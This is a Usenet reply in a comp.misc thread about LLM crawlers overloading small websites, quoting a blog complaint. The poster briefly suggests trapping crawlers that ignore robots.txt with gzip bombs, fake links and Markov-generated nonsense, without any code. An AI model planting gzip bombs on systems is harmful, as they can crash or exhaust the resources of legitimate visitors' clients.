Deutsch   English   Français   Italiano  
<slrn101ue1g.198p.anthk@openbsd.home.localhost>

View for Bookmarking (what is this?)
Look up another Usenet article

Path: ...!eternal-september.org!feeder3.eternal-september.org!news.eternal-september.org!eternal-september.org!.POSTED!not-for-mail
From: anthk <anthk@openbsd.home>
Newsgroups: comp.misc
Subject: Re: bad bot behavior
Date: Mon, 12 May 2025 06:24:45 -0000 (UTC)
Organization: A noiseless patient Spider
Lines: 32
Message-ID: <slrn101ue1g.198p.anthk@openbsd.home.localhost>
References: <vrc2r4$2okrp$1@dont-email.me> <vrc8qm$2tkq5$1@dont-email.me>
 <20250318182006.00006ae3@dne3.net>
Injection-Date: Mon, 12 May 2025 08:24:45 +0200 (CEST)
Injection-Info: dont-email.me; posting-host="cc7a24369ce4842ffee3a5ba377d97da";
	logging-data="1014028"; mail-complaints-to="abuse@eternal-september.org";	posting-account="U2FsdGVkX1+tzbhHTU57ue/8soSDLNxD"
User-Agent: slrn/1.0.3 (OpenBSD)
Cancel-Lock: sha1:KQ8Fc6xv7OEQmw40qIaatWrKVlo=
Bytes: 2193

On 2025-03-18, Toaster <toaster@dne3.net> wrote:
> On Tue, 18 Mar 2025 12:00:07 -0500
> D Finnigan <dog_cow@macgui.com> wrote:
>
>> On 3/18/25 10:17 AM, Ben Collver wrote:
>> > Please stop externalizing your costs directly into my face
>> > ==========================================================
>> > March 17, 2025 on Drew DeVault's blog
>> > 
>> > Over the past few months, instead of working on our priorities at
>> > SourceHut, I have spent anywhere from 20-100% of my time in any
>> > given week mitigating hyper-aggressive LLM crawlers at scale.
>> 
>> This is happening at my little web site, and if you have a web site, 
>> it's happening to you too. Don't be a victim.
>> 
>> Actually, I've been wondering where they're storing all this data;
>> and how much duplicate data is stored from separate parties all
>> scraping the web simultaneously, but independently.
>
> But what can be done to mitigate this issue? Crawlers and bots ruin the
> internet.
>

GZip bombs + fake links = profit. Remember that gz'ed web pages are a
standard, even lynx can parse gz files natively.

Also, Megahal/Hailo under Perl. Feed it nonsense, and create some 
non-visible contents under a robots.txt-dissallowed directory
full of Markov-chains generated nonsense and gzip bombs.